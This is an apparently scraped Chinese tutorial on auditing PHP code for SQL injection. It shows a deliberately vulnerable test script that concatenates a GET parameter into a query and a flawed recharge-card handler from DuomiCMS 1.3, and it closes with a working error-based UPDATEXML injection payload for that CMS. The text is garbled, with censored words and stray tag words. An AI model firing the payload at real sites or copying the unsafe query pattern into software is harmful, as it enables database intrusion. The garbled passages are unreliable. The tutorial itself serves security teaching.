PHP代码审计SQL注入篇

什么是SQL注入

SQL注入***(SQL Injection),简称注入***,是Web开发中最多见的一种安全漏洞。能够用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操做,甚至有可能获取数据库乃至系统用户最高权限。php

而形成SQL注入的缘由是由于程序没有有效过滤用户的输入,使***者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将***者的输入做为查询语句的一部分执行,致使原始的查询逻辑被改变,额外的执行了***者精心构造的恶意代码。mysql

SQL注入实例

不少Web开发者没有意识到SQL查询是能够被篡改的,从而把SQL查询看成可信任的命令。却不知,SQL查询是能够绕开访问控制,从而绕过身份验证和权限检查的。更有甚者,有可能经过SQL查询去运行主机系统级的命令。sql

下面将经过一些真实的例子来详细讲解SQL注入的方式。数据库

 
 

测试代码以下:安全

    
    
    
    
<?php$uid=$_GET['id']; $sql="SELECT * FROM userinfo where id=$uid";$conn=mysql_connect ('localhost','root','root');mysql_select_db("sql",$conn);$result=mysql_query($sql,$conn);print_r('当前SQL语句: '.$sql.'
结果: '
);print_r(mysql_fetch_row($result));?>
 
首先咱们看一下代码:
    
    
    
    
$uid=$_GET['id']; //获取GET值
     
     
     
     
$sql="SELECT * FROM userinfo where id=$uid"; //执行SQL语句
     
     
     
     
$conn=mysql_connect ('localhost','root','root');mysql_select_db("sql",$conn); //数据库配配置
      
      
      
      
$result=mysql_query($sql,$conn); //进行查询SQL语句
       
       
       
       
print_r('当前SQL语句: '.$sql.'
结果: '
);print_r(mysql_fetch_row($result)); //进行打印输出没有任何的过滤因此利用简单的SQL注入语句就能够直接查询相关须要的信息。
 
从截图能够看出本来的SQL语句已被注入更改,使用了UNION查询到当前用户。

另一个多米CMS最新版1.3版本注入实例。
漏洞文件member/mypay.php(14-40行)
     
     
     
     
if(empty($_SESSION['duomi_user_id'])){ showMsg("请先登陆","login.php"); exit();}elseif($dm=='mypay'){ $key=$_POST['cardkey']; if($key==""){showMsg("请输入充值卡号","-1");exit;} $pwd=$_POST['cardpwd']; if($pwd==""){showMsg("请输入充值卡密码","-1");exit;} $sqlt="SELECT * FROM duomi_card where ckey='$key'"; $sqlt="SELECT * FROM duomi_card where cpwd='$pwd'"; $row1 = $dsql->GetOne($sqlt); if(!is_array($row1) OR $row1['status']<>0){ showMsg("充值卡信息有误","-1");exit; }else{ $uname=$_SESSION['duomi_user_name']; $points=$row1['climit']; $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'"); $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE cpwd='$pwd'"); $dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username='$uname'"); showMsg("恭喜!充值成功!","mypay.php");exit; }}else{

此处的”cardpwd”变量没有进行过滤就以POST提交方式传入了数据库形成注入。 构造POC以下(注意此处须要注册用户而且登录详情请看该文件1-17行):
     
     
     
     
http://localhost/member/mypay.php?dm=mypayPOSTcardpwd=-1' AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and '1'='1

 



相关文章
相关标签/搜索